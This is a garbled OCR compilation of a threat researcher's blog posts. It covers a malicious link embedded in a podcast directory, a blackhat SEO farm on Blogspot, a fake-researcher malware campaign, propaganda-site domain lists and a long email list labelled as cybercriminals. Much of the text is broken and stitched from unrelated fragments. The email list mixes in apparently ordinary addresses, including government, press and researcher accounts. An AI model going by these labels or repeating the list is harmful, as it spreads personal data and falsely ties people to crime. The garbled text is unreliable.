AGBI99Xe05AIFJOWEEOWn/hDxeTPurbeHvpDkyGdXD6SgE4/sIFnB9206db6XeWp 
rE7ulkSgPNr+YW/3m1/G2N3McS/MYzvkk3NaAx6MVIOKDIW/dunE7m92ngfjDGAG 
s+IrmniFeeakGfEyPCZw6GneeoDjFKyD3MbKOMWjWVLIQCiI4LQ0+SkeQ0OOETS5MS 
reYDXMphnOdWynFSzlYb7m5o0nmU6C1g6BjBc9HvG+xZpgBikK3JR5GPsKhse+41S9 
aVJKhfQ19ZHRYIRycRBPU/ZTDG27zvisGLOBdPmsAaHP5MhOsJol1pTf5It/INVYF 
DIl/Fu84XGseHgno6éiEyobZDhHOMhXBx8LOUbLn6JLh7yurcbTvRhyACMAAJzsAymw 
JG/ydFCYON6hzFo8aSQVW2Km4 1LLst/1IngJ2ZOlgjnzJsyo4MDZmV8NIl+wfMjdgw 
csW9xKuLwfMsB9KmO0xm3kIYUSOReZPA+IQmi8gLqNikK+fEDTJsfRZm2LtRHVKZm 
Mjx5mFiX/Kv+ 1nnxp/OFXo9P6L6WwauRWUIF95AkK2+d4F04mbwA2bGaYgvuWyik+ 
UoOKFNrKzjaW52MSLdXmwjJAsMwMc6i+xwNX359u4jCkoT6CA3bkKCDQRf3YULARAA 
WB80IWg/sOWnVI9IGLbQOUJalZROQUIABMOpzvcZH8CoSfvcTXivDuCCl03+juDX 
8BgPMRISQiQOBWnZwBZOPgLW05SZ8339SOmFBsx0OvOwadXj 7C7HOcLvwC1XivPVI 
LIXHUb+8aCBPurBx3Y3vj+fkmXEUVBO6853u36n+hf3gLM9K/IkKNxSTRLIM8WY1r 
+vGHtDQgrZk6KAUy81J1Jy+LIMUJVOY/3HBaLCNXcRZbNNQ1hKq2CTttvOYOmMHPV 
JvMmPd0OPHbsdVj1uU1fTZu52fFVZBqvNboo3VA6Lv1/QIGMZIVFImjFOQOGVJY3i5 
jU9d7UEXxWkKtJtsDkIxBYC20Ri2NSn8UjWIVNolp6Y2PsjJeosUcJXqMXARQ8jjLA 
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XKZZQnNSMGxIdKimtUY9dH+40H8+hmszCnCLDSu6YDFFUWPw57opg2Z2svO0jJ4Nsp 
gw82]9bV5n4gIzBVodoP3WuzHqdoE39QYNe/b9woDWO8yYuwYwz6cK5d2s400s4v 
ycosJvh6+vDSYWQpzriFPSDFnF2VgWN6AcAK2025 75AOkOOu9dTHv8ySjtxrhOux 
Z2vfgiZ79QZmj+6AFGNvCD4syRl6pgeD7kigGGWYf/VOHFdOLW5xVKNxFih8AcwH 
cn8Wh9mb6IMOSHErfVVRKSbChWG4PxIsWZEHUqTR/V4kKAEQEAAYKCHWQYAQgACQWC 
X92LtQKDDAAKCRDYjPpRcde0B+fGD/9fOXUQKQXEb6dzq6P18UewWmOggQldmjCrO 
2yxloDtx0zZognbmMHLHVof509ys27cQFBzgar4WB-+ xtsorf+L4UdUHIy6D+JWInbH 
/ZvoOUVQNuUbBb+80AJMcyaoEPWUY7ID89VCNy01R8VTfhOUNhgSs/3nRENqqv8a2 
b3FADOxWYQn2ogKTIZYMkcrb7HiRFM4wf]43PXqtjroubXMoL+oSczOSG/mygUgC 
6qOdxeNs+siRsCyWuQfWbjBrRg/2hegBS7 BHWfMYLK/JWJYRJHcArdTVGVILPIO9 
BWcDm4uU+Lq8skFyy915hUjQnfVVLpnC7kf9mXgmQrRerzbPw1lsVVWcZXgaTXTbz 
IbY/M30S569ptzKnsfwRyH1vA6W1K93wV9dmxMeGmRI1qojW8gAAFdjKBw4SUfMnX 
9hs45KBknc9iIFSvnLrHKOMY5Wrzd6Nn9owqQGQBDekig6RuhaB+kwmSRUJM48/4d 
T2MGOaw6YMPAnaiycPjT1R4DreaG9fAWw17WclsLfpvrhuUeAXJdLDS5emgq3!ISPW 
pQPVF4Drw8MFK7iAfcaZY56nSI7Xw520+D4ULNkKM+A8vzh66pAw7HCInR8jB5pli5 
XIRZOEi2bteAGVwZOCpchO9vNf9lqy9ZWQCUacEIgOOLPPwwvacPbRuckOolcTIG 
VKW/gh/SxA== 

=RAw5 

—-END PGP PUBLIC KEY BLOCK—- 


Stay tuned! 


1, fietps://4. bp. blogspot. con/-GRay7 Ea c/X_9DP5ggK31/AAAAAAAALag ik oC1®RETgutt byRo HandrcKO_SDQCLDGASYH 
2. hetps://eviteer. con/dancho_danched 

3, htepe://nkedin,con/in/danchodenchod 

4, netps://wvy. facebook. con/dencho.danchev. 1426 

5, hetps://medium. con/Sdanchodanchev 
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17.1.8 Dancho Danchev’s Keynote at CyberCamp 2016 - "Exposing Koobface - The 
World’s Largest Botnet" - Recommended Watching! (2021-01-14 02:01) 


Dear blog readers, 


| wanted to take the time and effort and let everyone know that you can now watch my 
keynote presentation from CyberCamp 2016 on the topic of "[1]Exposing Koobface - The 
World’s Largest Botnet" and actually get a bigger picture in terms of my research into the 
workings of the [2]Koobface botnet where | was once the primary source of information on 
the way it used to work and eventually contributed to its demise by publishing personally 
identifiable information on one of its botnet masters potentially assisting U.S Law 
Enforcement on its way to track down and prosecute the cybercriminals behind the campaign. 


Stay tuned! 


1. https://www. youtube. com/watch?v=hgQ_nxoMXz 
2. https://ddanchev. blogspot .com/search/label/Koobface 
12919 


17.1.9 From "The Underground" With Love - A Compilation of Cybercrime Under- 
ground Chatter Referencing My Research (2021-01-14 02:30) 


Dear blog readers, 


I’ve decided to make a quick compilation of underground chatter including references of my 
research courtesy of high-profile cybercriminals internationally with the idea to raise awareness 
on their existence and to provoke more researchers to dig even deeper on their way to track 
down and prosecute the cybercriminals behind these campaigns. 


Recommended reading: 
- [1]Medium 

- [2] Twitter 

- [3]Speakerdeck 
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- [4]Archive.org 


If an image is worth a thousand words consider going through the following images courtesy 
of cybercriminals referencing my research: 


2) 4 200 HTTP t-the-boss.com / herl 4,906 textfhinl 
> 
Se Pa HTTP ts-the-boss.com fimagesimenu.is 4 spc atiory/ 


‘8 we HTTP homeandofficefun.c 


on 22bkey=sch9eS2Kctpw | S  text/hini 
s)9 200 HTTP antienshvarcoriinescannery3.com = /1/?ide2022bemershe’ Bback= IO TOS HOON GIDO 13,535 text/hin! 
to 200 =O sOWKTIP antinshvarcoriinescanneryS.com ji finaliquery. i 55,746 sephcation/.. 
@u 200 ~—OTTP SntienshvereoriinescanneryS.com fi fengliquery-rt.is 681 spphcation/.. 
»)) 
is 20) HTP antimshwareoriinescanneryS.com ji finaflctfile.js 13,220 apphcationy.. 
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Crabs man got married 


Crete - cos Index © Off tops 
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4.2.8 Malware Embedded Link at Pod-Planet (2008-02-18 05:01) 


2od-Planet com - The World's Largest and Most Accurate Podcast... 


?od-Planet.com knows henge We're the World's largest Podcast Directory 
www. pod-planet.com/ - Similar pages 


>od-Planet.com - The World's Largest and Most Accurate Podcast... 
This site may harm your computer. 

°od-Planet.com knows Podcasting. We're the World's largest Podcast Directory 
www. pod-planet. com/index.asp?folder_id=810 - Similar pages 


?od-Planet.com - The World's Largest and Most Accurate Podcast... 

this site may harm your computer 

current Folder: Personals (Showing 1-9 of 9). ------- Sort By ------- , Name ASC, Name DESC, 
Jescription ASC, Description DESC, Price ASC, Price DESC ... 

www. pod-planet.com/index.asp?folder_id=858 - Similar pages 


>od-Planet.com - The World's Largest and Most Accurate Podcast... 


This site may harm your computer. 

Sort By ---— , Name ASC, Name DESC, Description ASC, Description DESC, Price ASC, 
rice DESC, Rating ASC, Rating DESC ... 

www. pod-planet. com/index. asp?folder_id=G77 - Similar pages 


>od-Planet.com - The World's Largest and Most Accurate Podcast... 

this site may harm your computer 

Sort By ------- , Name ASC, Name DESC, Description ASC, Description DESC, Price ASC, 
?rice DESC, Rating ASC, Rating DESC ... 

www. pod-planet.com/index.asp?folder_id=666 - Similar pages 


>od-Planet.com - The World's Largest and Most Accurate Podcast... 


This site may harm your computer. 
?od-Planet.com knows Podcasting. We're the World's largest Podcast Directory 
www. pod-planet.com/index.asp?folder_id=787 - Similar pages 


>od-Planet.com - The World's Largest and Most Accurate Podcast... 

this site may harm your computer 

Sort By ------- . Name ASC, Name DESC, Description ASC, Description DESC, Price ASC, 
?rice DESC, Rating ASC, Rating DESC... 

www. pod-planet_com/index.asp?folder_id=795 - Similar page 


>od-Planet.com - The World's Largest and Most Accurate Podcast... 


This site may harm your computer. 

4ustralian (0), Belgian (0), Brazilian (0), Canadian (0), Chinese (0), Dutch (0). French (0), 
Serman (0), Hebrew (0), Italian (1), Japanese (0) ... 

www. pod-planet.com/index.asp?folder_id=788 - Similar pages 


>od-Planet.com - The World's Largest and Most Accurate Podcast... 

this site may harm your computer 

Sort By ------- , Name ASC, Name DESC, Description ASC, Description DESC, Price ASC, 
?rice DESC, Rating ASC, Rating DESC... 

www. pod-planet_comfindex.asp?folder_id=900 - Similar pages 


The "the World’s largest Podcast Directory" is currently embedded with a malicious link, 
whereas thankfully the campaign’s already in an undercover phrase and stopped responding 
over the weekend. The embedded link points to ame8.com/a.js (222.73.254.56) then loads 
ame8.com/app/helptop.do, once deobfuscated attempts to load ame8.com/app/cc.do as well 
as 51.la/?1587102 acting as the counter for the campaign. In case you remember, the web 
counter services offered by 51.la were also used in the [1]malware embedded attack at Chi- 
nese Internet Security Response Team. And with ame8.com hosted in China, someone’s either 
engineering a situation where we’re supposed to believe it’s [2]Chinese malicious parties be- 
hind it, thereby taking advantage of the media buzz, or it’s [3]Chinese attackers for real. For 
this particular case however, I'd go for the second scenario. 


1. http: //ddanchev. blogspot .com/2007/10/cisrt-serving-malware.html 


2. http: //ddanchev. blogspot . com/2007/09/chinas- cyber-espionage-ambitions.html 
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<td colspan="3" align="center”><br/> 
<input value="<object widthe"425* height="344"><parem name="movie” value="hetp://..."></paranm<enbed arce"hetp://..." 
type*"application/x-shockvave-fiash” vidth="425" height="344"></embed></object>" type="text” style="width: 340px™></td> 
</tr> 
</table> 
<br> 
<table style*"backgroumd-color: Weeeeee” class*"b* width="360" border="0" celipadding="0" cellapacing="0"> 
<tr> 
<td align="center” valigne"middle"><div align="lefct"><a href*"#" onclick="return 19e8S2aS27Séd82dbbb1();">Nore From use 
<br> 
<a breft-"#" onclick="return 19e8S2aS27Sé6d82dbbb1():">Related Videos</a></div> 
</div></td> 
</tr> 
</table></td> 
</tr> 
</table> 
</center> 


SESEAEEESEESESRESRTESRSTRSRSREE FE 
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R.1.P Dancho Danchev? 


ee 


BLP Dencteo Ounce? 
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> maeeeeatee Choose Time [Year ¥)| Month ¥|/ Day 4) To [Month ¥)( Oay 


» SSL. Cortacate ol 
* Merchant Account 
_ Subenit. Download 

connate [sem] [comme] 
» Domain After Market ‘& Current Domain Status 
* Customization 

No. Transaction Time Sum Mode Note 
Quick Access 1 payment o72a2006 00 © Shek apply fee movie2b biz 
¥ Customize Quick Access 2 payment o7/282008 7.99 biz domain regatraton fee movie2b biz 
¥ Bulk Register 3 payment OT272008 0.0 © She apply fee woxbeauty.net 
% List My Domains 4 payment OT 2772008 7.99 net domain registration fee sooxbeauty net 
Aad 5 payment 071772007 749 Domain Renewal Fee Astators 
¥ Registrar Transfer ; = == halen 
¥ Account Transfer ; 
¥ ONS-DIY 7 payment O772007 O73 payment processing fee cc 
¥ Add Funds 8 payment 07/7/2007 7.99 Doman Renewal Fee jadd.org 
¥ © Shield s payment 03122007 4.99 © Shiet apply fee rbanetwork com j 
¥ Order SSL Cent 10 payment ow1a2007 4.99 0 Shietd apply fee ‘akimen..com 


¥ Domain Monetizing Service 


¥ OONAM U2 pages totai:tt records [Top] (Prev) (Ned) (Lest) [ }(Ge) 
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C&C ARCHITECTURE 


Compared with the complex C&C architecture of the Storm, WALEDAC, and DOWNAD botnets, the KOOBFACE C&C 
infrastructure is very basic. It only consisted of infected nodes and C&C domains that used HTTP as its communication 
protocol 


Retrieve commands and 
1 KOOBFACE zombie PSone sage iP 


KOOBFACE C&C 


Retrieve commands from C&C 


S 


Affected User Aller tee | ns 
Figure 40. KOOBFACE C&C prior to July 19, 2009 Figure 41. Updated KOOBFACE C&C as of July 19, 2009 


This simplistic C&C approach is, of course, very vulnerable to takedowns. After several KOOBFACE C&C takedown 
attempts initiated by Intemet service providers (ISPs) and members of the security industry,’ the KOOBFACE gang 
realized the need for a more robust C&C infrastructure. Thus, on July 19, 2009, the KOOBFACE writers implemented 
a new C&C architecture that involved the use of proxy nodes to provide redundancy and to improve the survivability of 
their C&C should another takedown be attempted* 


A few days after the new KOOBFACE C&C infrastructure was implemented, the botnet was seen inserting a message 
(see below) for one of the security researchers tracking the malware's domain activities. 
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white hat info 


Stay tuned! 


1. https: //medium.com/@danchodanche 
2. https://twitter.com/dancho_danche 
3. https://speakerdeck.com/ddanche 

4. 


ttps://archive.org/details/@ddanche 


17.2 February 


17.2.1 Dancho Danchev’s Blog - Accepting Conference Invitations! (2021-02-05 02:54) 


[1] 
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% of % of % of % of 


Blog covered covered timely robust 
IOCs iocterms IOCs IOCs 
Dancho Danchev 42% 62% 14% 84% 
Naked Security 43% 55% 54% 45% 
THN 38% 38% 41% 51% 
Webroot 54% 79% 13% 84% 
ThreatPost 26% 37% 52% 29% 
TaoSecurity 57% 61% 31% 68% 
Sucuri 34% 35% 43% 52% 
PaloAlto 39% 44% 15% 87% 
Malwarebytes 32% 48% 26% 729% 
Hexacorn 49% 57% 59% 76% 


Dear blog readers, 


I’ve recently came across to a high-profile study entitled "[2JAcing the IOC Game: Toward 
Automatic Discovery and Analysis of Open-Source Cyber Threat Intelligence" which is actually 
including my personal blog and is referencing me as a high-profile and valuable source of threat 
intelligence and cybercrime research and I’ve decided to touch base with my blog readers 
in terms of soliciting possible security event and security conference invitations where | can 
attend and make a presentation on a variety of topics. 


Are you possibly somehow interested in having me attend your event and make a presentation 
on a hot topic? Approach me at dancho.danchev@hush.com 


Stay tuned! 


1. https://1.bp. blogspot .com/-2EWkG1MwOr4/YAmgYKMNtNI/AAAAAAAALSI/rtgvjZtey3wPFN274-wzKXxkyG2f6IGeJQCLcBGAsSYHQ 
s606/Misc_01.png 


2. https://homes.sice. indiana. edu/luyixing/bib/ccs16-ioc.pdf 


17.2.2 Can You Recognize These Guys? (2021-02-05 02:55) 


Appreciate my rhetoric. 
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3. http: //ddanchev. blogspot .com/2007/12/inside-chinese-underground-economy .htm 


4.2.9 Massive Blackhat SEO Targeting Blogspot (2008-02-18 05:15) 


With Blogspot’s fancy pagerank and with Google’s recent introduction of real-time content 
indexing of blogs using the service, the interest of blackhat SEO-ers into the efficient reg- 
istration and posting of junk content with the idea to monetize the traffic that will come 
from the process, seems to continue evolving as a process. In this specific case, we have 
firesearch.sc (64.111.196.120; 64.111.197.88) a blackhat SEO links farm that’s visualized in 
the attached screenshot, and several thousands of automatically registered blogspot accounts 
directly feeding the searching queries that led to visiting them into firesearch.sc. What’s 
also worth mentioning about this campaign is that the firesearch.sc’s javascript search field 
appears at the top of every blog, whereas the blog’s content itself consists of outgoing links 
to nearly fifty other such automatically registered blogs, again redirecting the search queries 
to firesearch.sc, whereas advertisements get served from 64.111.196.117/c.php 


Sample blogs : 


tilas-paralyze-video.blogspot.com 
parentdirectoryofnokia19942.blogspot.com 
imelodyalesana.blogspot.com 
iberryblack8320.blogspot.com 
ku990downloadwallpaper.blogspot.com 
blackberrypearl8100fre62265.blogspot.com 
motorolarazrv3amdriver90079.blogspot.com 
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Stay tuned! 


17.2.3 Rogue "Malware Spreading Security Researchers" Launch Malicious Social 
Engineering Campaign Against Legitimate Researchers - OSINT Analysis 
(2021-02-05 02:55) 


Security researchers from Google have recently [1]spotted and properly analyzed a currently 
circulation malicious software spreading social engineering driven malicious campaign that’s 
actively interacting with legitimate researchers on social media and private channels for the 
purpose of tricking them into testing a newly discovered zero day flaw which in reality drops 
malware on the affected hosts and phones back to a C &C server potentially attempting to 
compromise the researchers in question. 


Sample screenshots of the campaign currently in circulation: 


12933 


Zhang Guo 


I'm researching chrome RCE 
bugs. 


GM And you? 
14/12/20, 17:32 


Ah, | haven't done much with 


chrome 


14/12/20, 17:33 ¥ 


Gs what do u research? 
14/12/20, 17:35 


| can't really go into too much 


detail I'm afraid 


14/12/20, 17:36 ¥ 


why? 
No problem. 


Do u use other messenger? 


BR ca Start a message Ss 
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€ @ 


Helo James, 


James Willy 


Yes, ask me questions here and | will 
try to answer. :) 


12/08/20, 9:42 ¥ 
i'm finding vulnerabilities in 
windows kernel and browsers 


recently i'm studying directx 
kernel 


what messenger do you use? 


this talk contains some 
sensitive infos 


s use discord? 
12/08/20, 9:43 


| am sorry. | am not able to talk 
lf what you want to share is a 


vulnerability/or contains sensitive 
information then take extra care 

If it is too technical | would 
recommend you to talk to a trusted 
windows kernel guru 


anineinn 4 ay 
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© Zhang Guo 


| found windows kernel Oday,a 
few days ago 


I'm going to exploit it. 
But 
I'm 


looking for someone to research 
together. 


How about? 


lam not worthy 
But | appreciate you thinking of me 


I'm not at your level 


umm, what do you research? 
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Willy James 
last seen 2 hours ago 


dcomp-exp.zip.gpg 


431.5 KB 


decrypt successful? «25 ay. 


you can build andtestin yourvm  ;.o5 ayy 


» 
no build errors? «25 oy) 


yeah it's for x64 version «245 ayy 
itwas patched in november 2020 «.4> any 


v 


No errors? 5-49 any 


it will pop up cmd with system 4.46 ayy 


yes, I gettheshell j.47am Ww 


Iwill study this poc carefully ¢.46 ayy wy 
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Qa 


James Willy 


Hi, @_argp! 


Did you see our blog 
blog.brOvvnn.io/pages/ 
blogpost...? 


How do you think about it? 


Hi Patroklos 


Sample malicious MD5s known to have participated in the campaign: 


MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 
MD5: 


7fc2af97b004836c5452922d4491baaa 
6252cec30f4fb469aefa2233fe7323f8 
56018500f73e3f6cf179d3b853c27912 
b52e05683b15c6ad56cebea4a5a54990 
9e9f69ed56482fff18933c5ec8612063 
f5475608c0126582081e29927424f338 
ael7celeb59dd82f38efb9666f279044 


Stay tuned! 


1. https://blog. google/threat-analysis-group/new-campaign-targeting-security-researchers/ 
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17.2.4 FBI Shuts Down Radical Propaganda Online Web Sites - An OSINT Analysis 
(2021-02-05 02:56) 


[1] 


y ABABIL.ORG 


PALESTINA 


The U.S Department of Justice in direct cooperation with the FBI has recently [2]shut down 
a network of propaganda Web sites courtesy of what appears to be the Liberty Front Press 
network. 


In this post I'll provide actionable intelligence on the infrastructure behind the campaign and 
discuss in-depth the tactics techniques and procedures of the individuals behind it. 


hxxp://ababil.org - Email: ericl2shia@gmail.com; samirnet2@gmail.com; ababil.org; nas- 
sim@ababil.org - 185.51.8.92; 109.234.166.134; 104.28.15.191; 104.28.14.191 


Related domains known to have participated in the campaign: 
hxxp://ahtribune.com 
hxxp://al-ahd.net 
hxxp://al-naba.net 
hxxp://albabylon.com 
hxxp://aleppospace.com 
hxxp://alghadeer.tv 
hxxp://alharakah.net 
hxxp://alhiwaraldini.com 
hxxp://awdnews.com 
hxxp://criticalstudies.org 
hxxp://darinews.com 
hxxp://elintelecto.com 
hxxp://farhang-press.com 
hxxp://harkarmusulunci.org 
hxxp://iircenter.net 
hxxp://iuvm-sy.net 
hxxp://iuvmpixel.com 
hxxp://jordan-times.com 
hxxp://kelkeen.com 
hxxp://kurdrudaw.com 
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hxxp://mediaadil.com 
hxxp://roushd.com 
hxxp://rpfront.com 
hxxp://siampublic.com 
hxxp://studiesaf.com 
hxxp://syria-victory.com 
hxxp://voiceofwadi.com 
hxxp://yemenpress.org 

Related domains known to have participated in the campaign: 
hxxp://aftruth.com 
hxxp://alhadathps.com 
hxxp://alhadba.net 
hxxp://almejlis.org 
hxxp://almultaqaa.com 
hxxp://altanzil.net 
hxxp://bashiqa.com 
hxxp://hindkhabar.com 
hxxp://j-babel.com 
hxxp://ksastudies.net 
hxxp://hxxp://kurdestantimes.com 
hxxp://libyaalmokhtar.com 
hxxp://maghrebiyon.com 
hxxp://masralkenana.com 
hxxp://mediaadil.com 
hxxp://voiceofwadi.com 

Related emails known to have participated in the campaign: 
abdullatifmansour@hotmail.com 
aminbaik88@gmail.com 
m.h.memo1992@gmail.com 
walasr5@yahoo.com 
moosavi.2010@gmail.com 
iuvmdev@gmail.com 
moosavi.2010@gmail.com 
aminbaik88@gmail.com 
jeddoub 21@yahoo.com 
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Related domains known to have participated in the campaign: 


hxxp://adalah.com 
hxxp://ababil.org 
hxxp://aden-alyoum.com 
hxxp://adentimes.net 
hxxp://aftruth.com 
hxxp://ageofpakistan.com 
hxxp://ahtribune.com 
hxxp://al-ahd.net 
hxxp://al-hadath24.com 
hxxp://al-naba.net 
hxxp://al-sufia.com 
hxxp://albabylon.com 
hxxp://aleppospace.com 
hxxp://alghadeer.tv 
hxxp://alharakah.net 
hxxp://alhiwaraldini.com 
hxxp://almasirahpress.com 
hxxp://almasirahtv.com 
hxxp://alnaba.net 
hxxp://alsudanalyoum.com 
hxxp://altanzil.net 
hxxp://atlaniccouncil.org 
hxxp://awdnews.com 
hxxp://beritadunia.net 
hxxp://criticalstudies.org 
hxxp://darinews.com 
hxxp://elintelecto.com 
hxxp://en.alghadeer.tv 
hxxp://farhang-press.com 
hxxp://gahvare.com 
hxxp://getpanel.ir 
hxxp://haghighah.com 
hxxp://narkarmusulunci.org 


hxxp://hindkhabar.com 
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hxxp://historiadepalestina.com 
hxxp://hpiiran.com 
hxxp://iircenter.net 
hxxp://institutomanquehue.org 
hxxp://iraqnewsservice.com 
hxxp://irpowerweb.com 
hxxp://iuvm-sy.net 
hxxp://iuvm.org 
hxxp://iuvmdaily.com 
hxxp://iuvmdaily.net 
hxxp://iuvmpixel.com 
hxxp://iuvmpress.com 
hxxp://iuvmsy.net 
hxxp://iuvmtech.com 
hxxp://iuvmtv.com 
hxxp://jamekurdi.com 
hxxp://jordan-times.com 
hxxp://kelkeen.com 
hxxp://kurdrudaw.com 
hxxp://libertyfrontpress.com 
hxxp://libyaalmokhtar.com 
hxxp://mediaadil.com 
hxxp://nilenetonline.com 
hxxp://niletenonline.com 
hxxp://nthnews.net 
hxxp://pasargad.irandns.com 
hxxp://pergiustizia.com 
hxxp://puketnews.com 
hxxp://qudspal.com 
hxxp://raitunisia.com 
hxxp://riolattj.com 
hxxp://risolattj.com 
hxxp://roushd.com 
hxxp://rpfront.com 
hxxp://rpfront.org 
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downloadcredmakerforf64090.blogspot.com 
smsmarathi.blogspot.com 
pradaphonethemes. blogspot.com 


With a basic sample of ten such blogs, the entire operation could be tracked down and 
removed from Google’s index. And while firesearch.sc is pitching itself as a "search engine 
that you can trust", it looks like it’s not generating revenues for the people behind the 
operation, but also, acts as a keyword popularity blackhole. 


Related posts: 

[1]The Invisible Blackhat SEO Campaign 

[2]Attack of the SEO Bots on the .EDU Domain 
[3]Malicious Keywords Advertising 

[4]Visualizing a SEO Links Farm 

[5]Spammers and Phishers Breaking CAPTCHAs 
[6]But of Course It’s a Pleasant Transaction 
[7]Vladuz’s EBay CAPTCHA Populator 

[8]The Blogosphere and Splogs 

[9]pOrn.gov - The Ongoing Blackhat SEO Operation 


. http://ddanchev. blogspot .com/2008/01/invisible-blackhat-seo-campaign.htm 

. http: //ddanchev.blogspot.com/2007/01/attack- of-seo-bots-on-edu-domain. htm 

. http: //ddanchev. blogspot .com/2008/02/visualizing-seo-links-farm.htm 

. http: //ddanchev.blogspot.com/2007/09/spammers-and-phishers-breaking-captchas.htm 
. http: //ddanchev.blogspot .com/2006/08/but - of - course-its-pleasant-transaction.htm 
. http://ddanchev. blogspot .com/2007/03/vladuzs- ebay-captcha-populator.htm 

. http: //ddanchev.blogspot .com/2006/11/blogosphere-and-splogs .htm 


. http: //ddanchev.blogspot .com/2007/11/p0rngov- ongoing-blackhat-seo-operation.htm 
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4.2.10 Geolocating Malicious ISPs (2008-02-18 07:50) 


Here are some of the ISPs [1]knowingly or [2]unknowingly providing [3]infrastructure to the 
[4]RBN and the [5]New Media Malware Gang, a customer of the [6]RBN or [7]RBN’s actual 
operational department. To clarify even further, these are what can be defined as malicious 
ecosystems that actually interact with each other quite often. 
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hxxp://rpfront.us 
hxxp://sachtimes.com 
hxxp://sepehrict.ir 
hxxp://siampublic.com 
hxxp://studiesaf.com 
hxxp://syria-scope.com 
hxxp://syria-victory.com 
hxxp://theleadersnews.com 
hxxp://usjournal.net 
hxxp://voiceofwadi.com 
hxxp://whatsupic.com 
hxxp://yemaniate.net 
hxxp://yemenpress.org 
Stay tuned! 


1. https://1.bp.blogspot .com/-mjtQmgSWHYU/YByV3_A2DmI/AAAAAAAALtQ/1E4TQhNBU6MrMqYcf7x3h2g--HDGFHqHgCLcBGAsYHQ 
$3706/Misc_10.jpg 
2. https://www. justice. gov/opa/press-release/file/1334551/download 


17.2.5 Profiling a Currently Active Portfolio of High-Profile Cybercriminal Jab- 
ber and XMPP Accounts Including Email Address Accounts - Part Three 
(2021-02-16 13:44) 


Oft-the-Record Messaging 


Dear blog readers, 


It’s been a while since I’ve last posted a quality update following the announcement of my cur- 
rently active Law Enforcement and OSINT operation called "[1]Uncle George". Ever since I’ve 
originally announced it I’ve distributed the data set to a variety of researchers and vendors on 
their way to assist in possible enrichment and data mining of the data set potentially assisting 
in the disrupting the rogue cybercriminal operations launched on these cybercrime friendly 
forum communities potentially assisting U.S Law Enforcement on its way to track down and 
prosecute the cybercriminals behind these campaigns. 
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In this post I’ll provide yet another data mined collection of personally identifiable [2]high- 
profile cybercriminal XMPP/Jabber and email addresses with the idea to assist U.S Law Enforce- 
ment and the security industry on its way to track down and prosecute the cybercriminals 
behind these communities. 


Here’s a currently active XMPP/Jabber including email addresses list of high-profile cyber- 
criminals part of my currently ongoing Law Enforcement and OSINT operation called "Uncle 
George": 


info@hotmail.com 
asdfqwef@mail.ru 
123@mail.ru 
admin@mail.ru 
zaco@yandex.ru 
lenjka@list.ru 
lenjchik@mail.ru 
Sartagos@mail.ru 
vasya pupkin@mail.ru 
hacker@mail.ru 
duke@something.com 
aaaaa@bbbbb.com 

icq _admin@icq.com 
coolsite@inbox.ru 
mifik59@yandex.ru 
_ACC _@email.ru 

_ACC _@e-mail.ru 
xakep da@webxakep.net 
nextdoam@bk.ru 
allianzO8@rambler.ru 
Stas-ob94@mail.ru 
ispyder@mail.com 
eprst@hotmail.com 
rst-ml@hotmail.com 
igor _kravets @ukr.net 
cerebrum.mail@gmail.com 
volgin@list.ru 
azartik@inbox.ru 
admin@yandex.ru 
support@serank.ru 
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Eugenybn@rambler.ru 
roiugoyge@rambler.ru 
admch2007@yandex.ru 
hackturkiye.hackturkiye@gmail.com 
Sekomirza@windowslive.com 
luca.carettoni@securenetwork.it 
myiworm@mail.ru 
ah9960@yahoo.com 
mobilephoneplaza500@hotmail.com 
bdown197@verizon.net 

calif canuck@yahoo.com 
vacekokl@aol.com 

darkangel g85@yahoo.com 
dieforyou201035@yahoo.com 
Macbook3arabi@hotmail.com 
shoukri58@hotmail.com 
mido4040@hotmail.com 
abdosalam111@hotmail.com 
tito 2010kh@hotmail.com 
nomorecry1@hotmail.com 
e7sas O006@hotmail.com 
service x@hotmail.com 
cce@hotmail. it 
ccv@hotmail.it 
ccw@hotmail.it 
eec@hotmail.it 
eey@hotmail.it 
uae999555111@hotmail.com 
hmada.188@hotmail.com 
turki- _-O7@hotmil.com 
naif20117@hotmail.com 
abosomaa999@hotmail.com 
hack-3amer@hotmail.com 
Isv@hotmail.com 


Isw@hotmail.com 
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Isx@hotmail.com 
Isy@hotmail.com 
Isz@hotmail.com 
Is-@hotmail.com 

Is @hotmail.com 
ItO@hotmail.com 
a_11111@hotmail.com 
dizzler_p@hotmail.com 
example@hotmail.com 
mloooke2150@hotmail.com 
jyyosh@hotmail.it 
vrsObIckOsrvr@gmail.com 
www.blue _lagoon@hotmail.com 
nazaphone@live.com 

essh ocp@yahoo.com 
nmoor14@hotmail.com 
soace.world@yahoo.com 
vilrusObl4ck@gmail.com 
madamsalma77@yahoo.com 
lover120082008@hotmail.com 
user@hotmail.com 

mido 00031@yahoo.com 
medo _medo224@yahoo.com 
burtmr@aol.com 
basaksmith@aol.com 
cassiel1550@yahoo.com 
carolevowens@hotmail.com 
cbg3@optonline.net 

charnel mccall@yahoo.com 
bonoboface287@hotmail.com 
bdjsmithl1@comcast.net 
cbamhill@aol.com 
mtantaros@comcast.net 
augnish8@msn.com 
abjanifer@msn.com 
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acesfull76@yahoo.com 
pacx2@aol.com 
rfrenyea@charter.net 
debbie@patientequip.com 
cd.whitney@verizon.net 
careyonl1978@yahoo.com 
palewis@fdic.gov 
bonloox@yahoo.com 
carrollrogers@att.net 
blsternrn@yahoo.com 
99@gmail.com 
spoof@ebay.com 
spam@ebay.com 
adult@adult.com 
an2099@hotmail.fr 
dmoz@dmoz.com 
info@oxymium.net 
sl@linformaticien.fr 
phil@denfert.com 
write@koskow.com 
odrey21@magic.fr 
jvi-togo@live.com 
sale@sedo.com 
tips@vanae.com 
curtccp@gmail.com 
jvitogo@jahoo.fr 
now@vur.me 
wlester@ap.org 
nightly@nbc.com 
askfox@fox.com 
mybox@server.ru 
to@email.ru 
AffDmitriis00@gmail.com 
lucmind7@gmail.com 


redchain@thesecure.biz 
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kamikat@hot-chilli.eu 
flakon@exploit.im 
hackstoagroap@gmail.com 
startup.antichat@gmail.com 
witing1979@jabber.ru 
5maks5@exploit.im 
grizlii@jabber.to 
sett666@exploit.im 
wintendo@zloy.im 
blackservers@exploit.im 
mitpirates@xmpp.jp 
1047@exploit.im 
progresstudio@jabber.ru 
cephei@exploit.im 
sdcard128gb@jabber.ru 
yellgo@openmailbox.org 
ha-notsri@jabber.ru 
meniala@jabber.ru 
artban@bk.ru 
orzermevsewivo@mail.ru 
ffwje722@jabber.ru 
shornomaz1488@gmail.com 
big.t@exploit.im 
bigtomas@sj.ms 

alex boom66@mail.ru 
sales.brazzzers@exploit.im 
mobile.garant707@gmail.com 
mobile@exploit.im 
